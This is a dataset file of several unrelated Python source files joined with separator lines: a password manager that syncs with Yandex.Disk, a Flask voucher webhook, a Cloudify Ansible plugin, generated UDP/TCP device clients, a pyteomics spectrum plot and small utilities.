        'LS_COLORS',
    ]
    log.debug('Environment Variables:')
    for key, value in os.environ.items():
        if key not in ignorevars:
            log.debug(key + '=' + value)
    log.debug(line)

    log.debug('Command Line:')
    log.debug(sys.argv)
    log.debug('----- end protontricks debug info -----')
# emit the debug dump once, at import time
show_debug_info()
| StarcoderdataPython |
5126378 | import base64
import json
import os
import webbrowser
from datetime import datetime, timezone
from typing import Optional
from PyQt5 import QtWidgets
import yadisk
from cryptography.fernet import Fernet, InvalidToken
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
# cloud-sync status codes stored in BaseFile.status by check_file()
NO_YANDEX_DISK = 0    # working offline, no Yandex.Disk connection
NO_FILE_IN_CLOUD = 1  # connected, but no password file in the cloud
CLOUD_FILE_OLDER = 2  # cloud copy is older than the local file
CLOUD_FILE_NEWER = 3  # cloud copy is newer than the local file
FILES_IDENTICAL = 4   # timestamps match, nothing to sync
NO_LOCAL_FILE = 5     # cloud copy exists, local file is missing
class IncorrectPassword(Exception):
    """Raised when the master password fails to decrypt the store."""
    pass
class FileCorrupted(Exception):
    """Raised when decrypted data is not valid JSON."""
    pass
class UserCancelException(Exception):
    """Raised when the user declines to continue working offline."""
    pass
class BaseFile(QtWidgets.QWidget):
    """Password store widget: an encrypted local file ('pwd.bin') optionally
    synchronised with a Yandex.Disk application folder.

    Entries live in ``_passwords`` as ``{name: (login, password)}``, are
    serialised to JSON and encrypted with Fernet, whose key is derived from
    the master password via PBKDF2-HMAC-SHA256.
    """
    yandex_disk: Optional[yadisk.YaDisk]
    status: int
    base_changed: bool

    def __init__(self, *args):
        super().__init__(*args)
        self.yandex_disk = None    # set by connect_cloud(); None means offline
        self.main_password = ''
        self._passwords = {}
        self.status = 0
        self.base_changed = False  # True when there are unsaved edits
        self.generate_salt()

    def generate_salt(self):
        """Install the KDF salt.

        NOTE(review): despite the name, the salt is a hard-coded constant
        shared by every installation. Changing it would make existing
        pwd.bin files undecryptable, so this is only documented here.
        """
        self.salt = b'\x82\xe1\x85~!\xaf\xd5\xd2}\xbc#\xf0\x0f\xed\x02\xf9'

    @property
    def passwords(self):
        """Read-only view of the decrypted password mapping."""
        return self._passwords

    def connect_cloud(self):
        """Connect to Yandex.Disk using the saved OAuth token, requesting a
        new token when none is saved or the saved one is rejected."""
        try:
            with open('yadisk-token.txt') as f:
                yadisk_token = f.readline().strip()
        except FileNotFoundError:
            self.get_new_token()
            return
        self.yandex_disk = yadisk.YaDisk(token=yadisk_token)
        if not self.yandex_disk.check_token():
            # saved token is invalid -- ask whether to obtain a fresh one
            mb = QtWidgets.QMessageBox()
            mb.setWindowTitle('Ошибка')
            mb.setText('Токен Яндекс-диска некорректен.\nПолучить новый?')
            ok = mb.addButton('OK', QtWidgets.QMessageBox.AcceptRole)
            cancel = mb.addButton('Отмена', QtWidgets.QMessageBox.RejectRole)
            mb.exec()
            if mb.clickedButton() == ok:
                self.get_new_token()
            else:
                self.yadisk_error_dialog()

    def get_new_token(self):
        """Run the Yandex OAuth flow in the browser and persist the token
        to 'yadisk-token.txt'. App credentials come from 'yadisk-secret.txt'."""
        try:
            with open('yadisk-secret.txt') as f:
                application_id = f.readline().strip()
                application_secret = f.readline().strip()
        except FileNotFoundError:
            self.yadisk_error_dialog('Данные Yandex OAuth не найдены. '
                                     'Чтобы зарегистрировать приложение, '
                                     'перейдите по адресу: https://oauth.yandex.ru '
                                     'и сохраните выданные id и пароль в файл '
                                     'yadisk-secret.txt')
            return
        self.yandex_disk = yadisk.YaDisk(application_id, application_secret)
        url = self.yandex_disk.get_code_url()
        webbrowser.open(url)
        # keep prompting until a confirmation code is accepted or the user
        # cancels the input dialog
        while True:
            code, ok = QtWidgets.QInputDialog.getText(
                self,
                'Подтверждение',
                'Введите код подтверждения, полученный от Яндекс-диска:'
            )
            if ok:
                try:
                    response = self.yandex_disk.get_token(code)
                    break
                except yadisk.exceptions.BadRequestError:
                    # wrong code: show an error box, then ask again
                    mb = QtWidgets.QMessageBox()
                    mb.setWindowTitle('Ошибка')
                    mb.setText('Неверный код.')
                    ok = mb.addButton('OK', QtWidgets.QMessageBox.AcceptRole)
                    mb.exec()
                    if mb.clickedButton() == ok:
                        continue
            else:
                self.yadisk_error_dialog()
                return
        yadisk_token = self.yandex_disk.token = response.access_token
        with open('yadisk-token.txt', 'w') as f:
            f.write(yadisk_token)

    def yadisk_error_dialog(self, msg=None):
        """Show *msg* (default: 'disk unavailable') and ask whether to work
        offline; raises UserCancelException when the user declines."""
        msg = msg or 'Яндекс-диск недоступен.'
        mb = QtWidgets.QMessageBox()
        mb.setWindowTitle('Ошибка')
        mb.setText(msg + '\nРаботать оффлайн?')
        ok = mb.addButton('OK', QtWidgets.QMessageBox.AcceptRole)
        cancel = mb.addButton('Отмена', QtWidgets.QMessageBox.RejectRole)
        mb.exec()
        if mb.clickedButton() == ok:
            self.yandex_disk = None
        else:
            raise UserCancelException

    def check_file(self):
        """Compare the cloud copy of pwd.bin with the local one and record
        the outcome in ``self.status`` (one of the module-level codes)."""
        if not self.yandex_disk:
            self.status = NO_YANDEX_DISK
            return
        for file in self.yandex_disk.listdir('app:/'):
            if file['name'] == 'pwd.bin':
                created = file['created']
                break
        else:
            self.status = NO_FILE_IN_CLOUD
            return
        try:
            local_file_date = datetime.fromtimestamp(
                os.path.getmtime('pwd.bin'), timezone.utc
            )
        except FileNotFoundError:
            self.status = NO_LOCAL_FILE
            return
        # NOTE(review): 'created' is assumed to be a tz-aware datetime as
        # returned by yadisk -- confirm against the yadisk API docs.
        if created < local_file_date:
            self.status = CLOUD_FILE_OLDER
        elif created > local_file_date:
            self.status = CLOUD_FILE_NEWER
        else:
            self.status = FILES_IDENTICAL

    def download_file(self):
        """Fetch pwd.bin from the cloud, overwriting the local copy."""
        self.yandex_disk.download('app:/pwd.bin', 'pwd.bin')

    def read_file(self):
        """Decrypt pwd.bin and load it into ``_passwords``.

        Raises FileNotFoundError when the file is missing, IncorrectPassword
        when decryption fails, FileCorrupted when the plaintext is not JSON.
        """
        try:
            with open('pwd.bin', 'rb') as f:
                data = f.read()
        except FileNotFoundError:
            raise
        # derive the Fernet key from the master password (PBKDF2-HMAC-SHA256)
        kdf = PBKDF2HMAC(
            algorithm=hashes.SHA256(),
            length=32,
            salt=self.salt,
            iterations=100000,
            backend=default_backend()
        )
        key = base64.urlsafe_b64encode(kdf.derive(self.main_password.encode(encoding='utf-8')))
        f = Fernet(key)
        try:
            data = f.decrypt(data)
        except InvalidToken:
            raise IncorrectPassword
        try:
            self._passwords = json.loads(data)
        except ValueError:
            raise FileCorrupted

    def add_new_entry(self, name, login, password):
        """Add or replace the entry *name* and mark the base dirty."""
        self._passwords[name] = (login, password)
        self.base_changed = True

    def remove_entry(self, name):
        """Delete the entry *name* (KeyError if absent) and mark dirty."""
        self._passwords.pop(name)
        self.base_changed = True

    def save_file(self):
        """Serialise ``_passwords`` to JSON, encrypt it with the key derived
        from the master password, and write pwd.bin."""
        data = json.dumps(self._passwords).encode(encoding='utf-8')
        kdf = PBKDF2HMAC(
            algorithm=hashes.SHA256(),
            length=32,
            salt=self.salt,
            iterations=100000,
            backend=default_backend()
        )
        key = base64.urlsafe_b64encode(kdf.derive(self.main_password.encode(encoding='utf-8')))
        f = Fernet(key)
        with open('pwd.bin', 'wb') as file:
            file.write(f.encrypt(data))

    def upload_file(self):
        """Replace the cloud copy of pwd.bin with the local file; no-op when
        working offline."""
        if self.yandex_disk:
            # yadisk.upload refuses to overwrite, so remove any old copy first
            if any(
                    file['name'] == 'pwd.bin'
                    for file in self.yandex_disk.listdir('app:/')
            ):
                self.yandex_disk.remove('app:/pwd.bin')
            self.yandex_disk.upload('pwd.bin', 'app:/pwd.bin')

    def create_base(self):
        """Start a fresh, empty password base."""
        self._passwords = {}
| StarcoderdataPython |
8062324 | from flask import Blueprint, request
from rapidpro_webhooks.apps.core.decorators import limit
from rapidpro_webhooks.apps.core.exceptions import VoucherException
from rapidpro_webhooks.apps.core.helpers import create_response
from rapidpro_webhooks.apps.vouchers.models import Voucher
# Flask blueprint grouping the voucher webhook endpoints
voucher_bp = Blueprint('voucher', __name__)
@voucher_bp.route('/', methods=['GET'])
def ureport_bp():
    """Index/health endpoint for the voucher app.

    (The function name doubles as the Flask endpoint name, so it is kept
    as-is even though it doesn't match the blueprint.)
    """
    payload = {'app': 'Voucher'}
    return create_response(payload)
@voucher_bp.route('/validate', methods=['POST'])
@limit(max_requests=10000, group="voucher", by='ip')
def validate_voucher():
    """Redeem a voucher code posted by RapidPro and report its validity.

    Reads 'text' (the code), 'phone' and 'flow' from the JSON or form body;
    on redemption failure the reason is included in the response.
    """
    payload = request.json or request.form
    result = {'validity': 'invalid'}
    try:
        Voucher.redeem(payload.get('text'), payload.get('phone'), payload.get('flow'))
        result['validity'] = 'valid'
    except VoucherException as err:
        result['reason'] = str(err)
    return create_response(result)
| StarcoderdataPython |
1806487 | <filename>apps/shop/urls.py
from django.conf.urls import url, include
from .views import shop,detail
# URL routes for the shop app
urlpatterns = [
    url(r'^$', shop, name='index'),
    url(r'^detail$', detail, name='detail'),
    url(r'^cart/', include('apps.shop.cart.urls', namespace='cart')),  # shopping-cart module
]
| StarcoderdataPython |
6556727 | <gh_stars>0
from django.http import HttpResponse
def dashboard(request):
    """Render a plain-text placeholder for the dashboard index."""
    message = "Hello, world. You're at the dashboard index."
    return HttpResponse(message)
115503 | <reponame>rajalokan/cloudify-ansible-plugin
########
# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
# Built-in Imports
import os
import shutil
# Third-party Imports
# Cloudify imports
from cloudify import ctx
from ansible_plugin import utils
from cloudify.decorators import operation
@operation
def configure(user=None, key=None, **kwargs):
    """Write an ansible.cfg pointing at the agent key and prime the env.

    Sets ANSIBLE_CONFIG/USER/HOME for subsequent playbook runs and
    recreates an empty ~/.ansible directory.

    :param user: agent user name; resolved via utils when None.
    :param key: keypair identifier used to locate the private key file.
    """
    agent_key_path = utils.get_keypair_path(key)
    # host_key_checking=False avoids interactive SSH prompts on first contact.
    configuration = '[defaults]\n' \
                    'host_key_checking=False\n' \
                    'private_key_file={0}\n'.format(agent_key_path)
    ctx.logger.info('Configuring Anisble.')  # (sic: "Anisble" typo in log text)
    file_path = utils.write_configuration_file(configuration)
    ctx.logger.info('Configured Ansible.')
    os.environ['ANSIBLE_CONFIG'] = file_path
    os.environ['USER'] = utils.get_agent_user(user)
    os.environ['HOME'] = home = os.path.expanduser("~")
    # Start from a clean ~/.ansible so stale state cannot leak between runs.
    if os.path.exists(os.path.join(home, '.ansible')):
        shutil.rmtree(os.path.join(home, '.ansible'))
    os.makedirs(os.path.join(home, '.ansible'))
@operation
def ansible_playbook(playbooks, inventory=None, **kwargs):
    """Runs a playbook as part of a Cloudify lifecycle operation.

    :param playbooks: iterable of playbook file names, executed in order.
    :param inventory: optional list of inventory entries; defaults to empty.
        BUG FIX: the default used to be the mutable ``list()``, which is
        created once at import time and shared between all calls.
    """
    if inventory is None:
        inventory = []
    inventory_path = utils.get_inventory_path(inventory)
    ctx.logger.info('This is custome okan')
    ctx.logger.info('Inventory path: {0}.'.format(inventory_path))
    # NOTE(review): dropped the unused ``user = utils.get_agent_user()``
    # lookup -- the value was never referenced.
    for playbook in playbooks:
        playbook_path = utils.get_playbook_path(playbook)
        ctx.logger.info('Playbook path: {0}.'.format(playbook_path))
        # Run against localhost with the local connection plugin; the
        # generated ansible.cfg (see configure()) supplies key settings.
        command = ['ansible-playbook',
                   '-i', 'localhost,', '-c', 'local', playbook_path,
                   '--timeout=60']
        ctx.logger.info('Running command: {0}.'.format(command))
        utils.run_ansible_command(command)
        # ctx.logger.info('Command Output: {0}.'.format(output))
    ctx.logger.info('Finished running the Ansible Playbook.')
| StarcoderdataPython |
9616405 | # coding=utf-8
# generated at 2018-10-12 21:38:39
import prometheus
import socket
import time
import gc
import prometheus.crypto
import prometheus.misc
import prometheus.psocket
import prometheus.logging as logging
gc.collect()
# region Test01UdpClient
class Test01UdpClientIntegratedLed(prometheus.Prometheus):
    """Generated UDP proxy for the remote integrated LED (codes i0/i1/iv)."""
    def __init__(self, send, recv):
        prometheus.Prometheus.__init__(self)
        # Transport callables supplied by the owning Test01UdpClient.
        self.send = send
        self.recv = recv
    @prometheus.Registry.register('Test01UdpClientIntegratedLed', 'i1')
    def on(self, **kwargs):
        """Turn the LED on (command code ``i1``)."""
        self.send(b'i1', **kwargs)
    @prometheus.Registry.register('Test01UdpClientIntegratedLed', 'i0')
    def off(self, **kwargs):
        """Turn the LED off (command code ``i0``)."""
        self.send(b'i0', **kwargs)
    @prometheus.Registry.register('Test01UdpClientIntegratedLed', 'iv', str)
    def value(self, **kwargs):
        """Query the LED state (code ``iv``); returns the decoded reply."""
        self.send(b'iv', **kwargs)
        return self.recv()
class Test01UdpClientLaser(prometheus.Prometheus):
    """Generated UDP proxy for the remote laser (codes l0/l1/lv)."""
    def __init__(self, send, recv):
        prometheus.Prometheus.__init__(self)
        # Transport callables supplied by the owning Test01UdpClient.
        self.send = send
        self.recv = recv
    @prometheus.Registry.register('Test01UdpClientLaser', 'lv', str)
    def value(self, **kwargs):
        """Query the laser state (code ``lv``); returns the decoded reply."""
        self.send(b'lv', **kwargs)
        return self.recv()
    @prometheus.Registry.register('Test01UdpClientLaser', 'l0')
    def off(self, **kwargs):
        """Switch the laser off (command code ``l0``)."""
        self.send(b'l0', **kwargs)
    @prometheus.Registry.register('Test01UdpClientLaser', 'l1')
    def on(self, **kwargs):
        """Switch the laser on (command code ``l1``)."""
        self.send(b'l1', **kwargs)
class Test01UdpClientJoysticky(prometheus.Prometheus):
    """Generated UDP proxy for the joystick Y axis (code yr)."""
    def __init__(self, send, recv):
        prometheus.Prometheus.__init__(self)
        self.send = send
        self.recv = recv
    @prometheus.Registry.register('Test01UdpClientJoysticky', 'yr', str)
    def read(self, **kwargs):
        """Read the Y-axis value (code ``yr``); returns the decoded reply."""
        self.send(b'yr', **kwargs)
        return self.recv()
class Test01UdpClientJoystickx(prometheus.Prometheus):
    """Generated UDP proxy for the joystick X axis (code xr)."""
    def __init__(self, send, recv):
        prometheus.Prometheus.__init__(self)
        self.send = send
        self.recv = recv
    @prometheus.Registry.register('Test01UdpClientJoystickx', 'xr', str)
    def read(self, **kwargs):
        """Read the X-axis value (code ``xr``); returns the decoded reply."""
        self.send(b'xr', **kwargs)
        return self.recv()
class Test01UdpClientSwitch(prometheus.Prometheus):
    """Generated UDP proxy for the remote switch (code sv)."""
    def __init__(self, send, recv):
        prometheus.Prometheus.__init__(self)
        self.send = send
        self.recv = recv
    @prometheus.Registry.register('Test01UdpClientSwitch', 'sv', str)
    def value(self, **kwargs):
        """Query the switch state (code ``sv``); returns the decoded reply."""
        self.send(b'sv', **kwargs)
        return self.recv()
class Test01UdpClientJoystickswitch(prometheus.Prometheus):
    """Generated UDP proxy for the joystick push-button switch (code jv)."""
    def __init__(self, send, recv):
        prometheus.Prometheus.__init__(self)
        self.send = send
        self.recv = recv
    @prometheus.Registry.register('Test01UdpClientJoystickswitch', 'jv', str)
    def value(self, **kwargs):
        """Query the joystick switch state (code ``jv``)."""
        self.send(b'jv', **kwargs)
        return self.recv()
class Test01UdpClientWindow01digital(prometheus.Prometheus):
    """Generated UDP proxy for digital window sensor 1 (code w1v)."""
    def __init__(self, send, recv):
        prometheus.Prometheus.__init__(self)
        self.send = send
        self.recv = recv
    @prometheus.Registry.register('Test01UdpClientWindow01digital', 'w1v', str)
    def value(self, **kwargs):
        """Query window sensor 1 (code ``w1v``); returns the decoded reply."""
        self.send(b'w1v', **kwargs)
        return self.recv()
class Test01UdpClientWindow02digital(prometheus.Prometheus):
    """Generated UDP proxy for digital window sensor 2 (code w2v)."""
    def __init__(self, send, recv):
        prometheus.Prometheus.__init__(self)
        self.send = send
        self.recv = recv
    @prometheus.Registry.register('Test01UdpClientWindow02digital', 'w2v', str)
    def value(self, **kwargs):
        """Query window sensor 2 (code ``w2v``); returns the decoded reply."""
        self.send(b'w2v', **kwargs)
        return self.recv()
class Test01UdpClient(prometheus.misc.RemoteTemplate):
    """Generated UDP client for the Test01 node.

    Binds a non-blocking UDP socket, sends short command codes to the
    remote node and reassembles newline-delimited replies per sender
    address using prometheus.Buffer.
    """
    def __init__(self, remote_host, remote_port=9195, bind_host='', bind_port=9195):
        prometheus.misc.RemoteTemplate.__init__(self)
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.socket.bind((bind_host, bind_port))
        logging.info('listening on %s:%d' % (bind_host, bind_port))
        self.socket.settimeout(0)  # non-blocking: the recv helpers poll
        self.remote_addr = (remote_host, remote_port)
        self.buffers = dict()  # per-sender reassembly buffers
        self.splitChars = b'\n'  # packet separator
        self.endChars = b'\r'  # command/args separator
        self.integrated_led = Test01UdpClientIntegratedLed(self.send, self.recv)
        self.register(integrated_led=self.integrated_led)
        self.joystickswitch = Test01UdpClientJoystickswitch(self.send, self.recv)
        self.register(joystickswitch=self.joystickswitch)
        self.joystickx = Test01UdpClientJoystickx(self.send, self.recv)
        self.register(joystickx=self.joystickx)
        self.joysticky = Test01UdpClientJoysticky(self.send, self.recv)
        self.register(joysticky=self.joysticky)
        self.laser = Test01UdpClientLaser(self.send, self.recv)
        self.register(laser=self.laser)
        self.switch = Test01UdpClientSwitch(self.send, self.recv)
        self.register(switch=self.switch)
        self.window01digital = Test01UdpClientWindow01digital(self.send, self.recv)
        self.register(window01digital=self.window01digital)
        self.window02digital = Test01UdpClientWindow02digital(self.send, self.recv)
        self.register(window02digital=self.window02digital)
    def send(self, data, **kwargs):
        """Frame a command as code + CR + args + LF and transmit it."""
        # BUG FIX: was ``len(kwargs) is 0`` -- ``is`` with an int literal
        # tests object identity, which is implementation-defined for ints;
        # use plain truthiness instead.
        if not kwargs:
            args = b''
        else:
            args = prometheus.args_to_bytes(kwargs)
        self.socket.sendto(data + self.endChars + args + self.splitChars, self.remote_addr)
    def try_recv(self, buffersize):
        """Non-blocking recvfrom; returns (None, None) when nothing queued."""
        try:
            return self.socket.recvfrom(buffersize)  # data, addr
        except prometheus.psocket.socket_error:
            return None, None
    def recv_once(self, buffersize=10):
        """Poll once; returns a complete packet or None if none is ready."""
        data, addr = self.try_recv(buffersize)
        if data is None:
            return None
        if addr not in self.buffers:
            self.buffers[addr] = prometheus.Buffer(split_chars=self.splitChars, end_chars=self.endChars)
        self.buffers[addr].parse(data)
        bufferpacket = self.buffers[addr].pop()
        if bufferpacket is None:
            return None
        return bufferpacket.packet
    def recv(self, buffersize=20):
        """Receive with the default 0.5 second timeout."""
        return self.recv_timeout(buffersize, 0.5)
    def recv_timeout(self, buffersize, timeout):
        """
        Poll for a packet until ``timeout`` seconds elapse.

        :param buffersize: int
        :param timeout: float
        :return: packet payload, or None on timeout
        """
        timestamp = time.time()
        while (time.time() - timestamp) < timeout:
            data = self.recv_once(buffersize)
            if data is not None:
                return data
        return None
# endregion
# region Test01TcpClient
class Test01TcpClientIntegratedLed(prometheus.Prometheus):
    """Generated TCP proxy for the remote integrated LED (codes i0/i1/iv)."""
    def __init__(self, send, recv):
        prometheus.Prometheus.__init__(self)
        # Transport callables supplied by the owning Test01TcpClient.
        self.send = send
        self.recv = recv
    @prometheus.Registry.register('Test01TcpClientIntegratedLed', 'i1')
    def on(self, **kwargs):
        """Turn the LED on (command code ``i1``)."""
        self.send(b'i1', **kwargs)
    @prometheus.Registry.register('Test01TcpClientIntegratedLed', 'i0')
    def off(self, **kwargs):
        """Turn the LED off (command code ``i0``)."""
        self.send(b'i0', **kwargs)
    @prometheus.Registry.register('Test01TcpClientIntegratedLed', 'iv', str)
    def value(self, **kwargs):
        """Query the LED state (code ``iv``); returns the decoded reply."""
        self.send(b'iv', **kwargs)
        return self.recv()
class Test01TcpClientLaser(prometheus.Prometheus):
    """Generated TCP proxy for the remote laser (codes l0/l1/lv)."""
    def __init__(self, send, recv):
        prometheus.Prometheus.__init__(self)
        self.send = send
        self.recv = recv
    @prometheus.Registry.register('Test01TcpClientLaser', 'lv', str)
    def value(self, **kwargs):
        """Query the laser state (code ``lv``); returns the decoded reply."""
        self.send(b'lv', **kwargs)
        return self.recv()
    @prometheus.Registry.register('Test01TcpClientLaser', 'l0')
    def off(self, **kwargs):
        """Switch the laser off (command code ``l0``)."""
        self.send(b'l0', **kwargs)
    @prometheus.Registry.register('Test01TcpClientLaser', 'l1')
    def on(self, **kwargs):
        """Switch the laser on (command code ``l1``)."""
        self.send(b'l1', **kwargs)
class Test01TcpClientJoysticky(prometheus.Prometheus):
    """Generated TCP proxy for the joystick Y axis (code yr)."""
    def __init__(self, send, recv):
        prometheus.Prometheus.__init__(self)
        self.send = send
        self.recv = recv
    @prometheus.Registry.register('Test01TcpClientJoysticky', 'yr', str)
    def read(self, **kwargs):
        """Read the Y-axis value (code ``yr``); returns the decoded reply."""
        self.send(b'yr', **kwargs)
        return self.recv()
class Test01TcpClientJoystickx(prometheus.Prometheus):
    """Generated TCP proxy for the joystick X axis (code xr)."""
    def __init__(self, send, recv):
        prometheus.Prometheus.__init__(self)
        self.send = send
        self.recv = recv
    @prometheus.Registry.register('Test01TcpClientJoystickx', 'xr', str)
    def read(self, **kwargs):
        """Read the X-axis value (code ``xr``); returns the decoded reply."""
        self.send(b'xr', **kwargs)
        return self.recv()
class Test01TcpClientSwitch(prometheus.Prometheus):
    """Generated TCP proxy for the remote switch (code sv)."""
    def __init__(self, send, recv):
        prometheus.Prometheus.__init__(self)
        self.send = send
        self.recv = recv
    @prometheus.Registry.register('Test01TcpClientSwitch', 'sv', str)
    def value(self, **kwargs):
        """Query the switch state (code ``sv``); returns the decoded reply."""
        self.send(b'sv', **kwargs)
        return self.recv()
class Test01TcpClientJoystickswitch(prometheus.Prometheus):
    """Generated TCP proxy for the joystick push-button switch (code jv)."""
    def __init__(self, send, recv):
        prometheus.Prometheus.__init__(self)
        self.send = send
        self.recv = recv
    @prometheus.Registry.register('Test01TcpClientJoystickswitch', 'jv', str)
    def value(self, **kwargs):
        """Query the joystick switch state (code ``jv``)."""
        self.send(b'jv', **kwargs)
        return self.recv()
class Test01TcpClientWindow01digital(prometheus.Prometheus):
    """Generated TCP proxy for digital window sensor 1 (code w1v)."""
    def __init__(self, send, recv):
        prometheus.Prometheus.__init__(self)
        self.send = send
        self.recv = recv
    @prometheus.Registry.register('Test01TcpClientWindow01digital', 'w1v', str)
    def value(self, **kwargs):
        """Query window sensor 1 (code ``w1v``); returns the decoded reply."""
        self.send(b'w1v', **kwargs)
        return self.recv()
class Test01TcpClientWindow02digital(prometheus.Prometheus):
    """Generated TCP proxy for digital window sensor 2 (code w2v)."""
    def __init__(self, send, recv):
        prometheus.Prometheus.__init__(self)
        self.send = send
        self.recv = recv
    @prometheus.Registry.register('Test01TcpClientWindow02digital', 'w2v', str)
    def value(self, **kwargs):
        """Query window sensor 2 (code ``w2v``); returns the decoded reply."""
        self.send(b'w2v', **kwargs)
        return self.recv()
class Test01TcpClient(prometheus.misc.RemoteTemplate):
    """Generated TCP client for the Test01 node.

    Connects lazily on first send, retries once on socket errors, and
    reassembles newline-delimited replies with prometheus.Buffer.
    """
    def __init__(self, remote_host, remote_port=9195, bind_host=None, bind_port=9195):
        prometheus.misc.RemoteTemplate.__init__(self)
        self.socket = None  # type: socket.socket  # created on first send
        self.bind_host = bind_host
        self.bind_port = bind_port
        self.remote_addr = (remote_host, remote_port)
        self.buffers = dict()  # per-sender reassembly buffers
        self.split_chars = b'\n'  # packet separator
        self.end_chars = b'\r'  # command/args separator
        self.integrated_led = Test01TcpClientIntegratedLed(self.send, self.recv)
        self.register(integrated_led=self.integrated_led)
        self.joystickswitch = Test01TcpClientJoystickswitch(self.send, self.recv)
        self.register(joystickswitch=self.joystickswitch)
        self.joystickx = Test01TcpClientJoystickx(self.send, self.recv)
        self.register(joystickx=self.joystickx)
        self.joysticky = Test01TcpClientJoysticky(self.send, self.recv)
        self.register(joysticky=self.joysticky)
        self.laser = Test01TcpClientLaser(self.send, self.recv)
        self.register(laser=self.laser)
        self.switch = Test01TcpClientSwitch(self.send, self.recv)
        self.register(switch=self.switch)
        self.window01digital = Test01TcpClientWindow01digital(self.send, self.recv)
        self.register(window01digital=self.window01digital)
        self.window02digital = Test01TcpClientWindow02digital(self.send, self.recv)
        self.register(window02digital=self.window02digital)
    def create_socket(self):
        """(Re)create the TCP socket and connect to the remote node."""
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # BUG FIX: SO_REUSEADDR must be set *before* bind() to have any
        # effect; it was previously set after the bind call.
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        if self.bind_host is not None:
            logging.notice('bound to %s:%d' % (self.bind_host, self.bind_port))
            self.socket.bind((self.bind_host, self.bind_port))
        self.socket.settimeout(5)
        logging.info('Connecting to %s' % repr(self.remote_addr))
        self.socket.connect(self.remote_addr)
    def send_once(self, data, args):
        """Transmit one framed command (code + CR + args + LF), no retry."""
        self.socket.send(data + self.end_chars + args + self.split_chars)
    def send(self, data, **kwargs):
        """Frame and send a command, reconnecting once on socket errors."""
        # BUG FIX: was ``len(kwargs) is 0`` -- identity comparison with an
        # int literal is implementation-defined; use truthiness instead.
        if not kwargs:
            args = b''
        else:
            args = prometheus.args_to_bytes(kwargs)
        if self.socket is None:
            self.create_socket()
        try:
            self.send_once(data, args)
        except prometheus.psocket.socket_error:
            self.create_socket()
            self.send_once(data, args)
    def try_recv(self, buffersize):
        """recvfrom wrapper; returns (None, None) on socket errors."""
        try:
            return self.socket.recvfrom(buffersize)  # data, addr
        except prometheus.psocket.socket_error:
            return None, None
    def recv(self, buffersize=10):
        """Receive one complete packet, or None if nothing is available."""
        data, addr = self.try_recv(buffersize)
        if data is None:
            return None
        if addr not in self.buffers:
            self.buffers[addr] = prometheus.Buffer(split_chars=self.split_chars, end_chars=self.end_chars)
        self.buffers[addr].parse(data)
        bufferpacket = self.buffers[addr].pop()
        if bufferpacket is None:
            return None
        return bufferpacket.packet
# endregion
| StarcoderdataPython |
282981 | <reponame>donnyyy777/pyteomics
from pyteomics import mgf, pepxml, mass
import os
from urllib.request import urlopen, Request
import pylab
# get the files
# Download the two example data files once; skip any that already exist.
for fname in ('mgf', 'pep.xml'):
    if not os.path.isfile('example.' + fname):
        # Some hosts reject urllib's default User-Agent, so spoof a browser.
        headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'}
        url = 'http://pyteomics.readthedocs.io/en/latest/_static/example.' + fname
        request = Request(url, None, headers)
        target_name = 'example.' + fname
        with urlopen(request) as response, open(target_name, 'wb') as fout:
            print('Downloading ' + target_name + '...')
            fout.write(response.read())
def fragments(peptide, types=('b', 'y'), maxcharge=1):
    """
    The function generates all possible m/z for fragments of types
    `types` and of charges from 1 to `maxcharge`.

    Yields one m/z value (float) per fragment/charge combination.
    """
    # BUG FIX: the upper bound was len(peptide)-1, which skipped the last
    # cleavage site and therefore never produced the b_{n-1} and y_1 ions.
    for i in range(1, len(peptide)):
        for ion_type in types:
            for charge in range(1, maxcharge+1):
                if ion_type[0] in 'abc':
                    # N-terminal ion series: mass of the peptide prefix.
                    yield mass.fast_mass(
                        peptide[:i], ion_type=ion_type, charge=charge)
                else:
                    # C-terminal ion series: mass of the peptide suffix.
                    yield mass.fast_mass(
                        peptide[i:], ion_type=ion_type, charge=charge)
# Pair the first spectrum with the first PSM and overlay theoretical peaks.
with mgf.read('example.mgf') as spectra, pepxml.read('example.pep.xml') as psms:
    spectrum = next(spectra)
    psm = next(psms)
pylab.figure()
pylab.title('Theoretical and experimental spectra for '
            + psm['search_hit'][0]['peptide'])
pylab.xlabel('m/z, Th')
pylab.ylabel('Intensity, rel. units')
# Experimental spectrum drawn as narrow black sticks.
pylab.bar(spectrum['m/z array'], spectrum['intensity array'], width=0.1, linewidth=2,
          edgecolor='black')
theor_spectrum = list(fragments(psm['search_hit'][0]['peptide'],
                                maxcharge=psm['assumed_charge']))
# Theoretical fragments as translucent red sticks of uniform (max) height.
pylab.bar(theor_spectrum,
          [spectrum['intensity array'].max()]*len(theor_spectrum),
          width=0.1, edgecolor='red', alpha=0.7)
pylab.show()
| StarcoderdataPython |
6487471 | <reponame>rawat9/leetcode
class Solution:
    """LeetCode 973: order points by squared distance to the origin."""

    def distance(self, point):
        """Squared Euclidean distance of ``point`` from the origin.

        The square root is skipped: it is monotonic, so orderings agree.
        """
        x, y = point[0], point[1]
        return x * x + y * y

    def kClosest(self, points: list[list[int]], k: int) -> list[list[int]]:
        """Return the ``k`` points nearest the origin.

        Sorts ``points`` in place (same observable side effect as before).
        """
        points.sort(key=self.distance)
        return points[0:k]
| StarcoderdataPython |
4818824 | from vic import lib as vic_lib
def test_make_veg_var():
    """make_veg_var(4) should return a non-None structure with defaults."""
    assert vic_lib.make_veg_var(4) is not None
def test_make_veg_var_1snowband():
    """make_veg_var(4) with a single snow band configured."""
    # NOTE(review): mutating the shared vic_lib.options leaks into later
    # tests (no teardown) -- confirm the test ordering is intentional.
    vic_lib.options.SNOW_BAND = 1
    assert vic_lib.make_veg_var(4) is not None
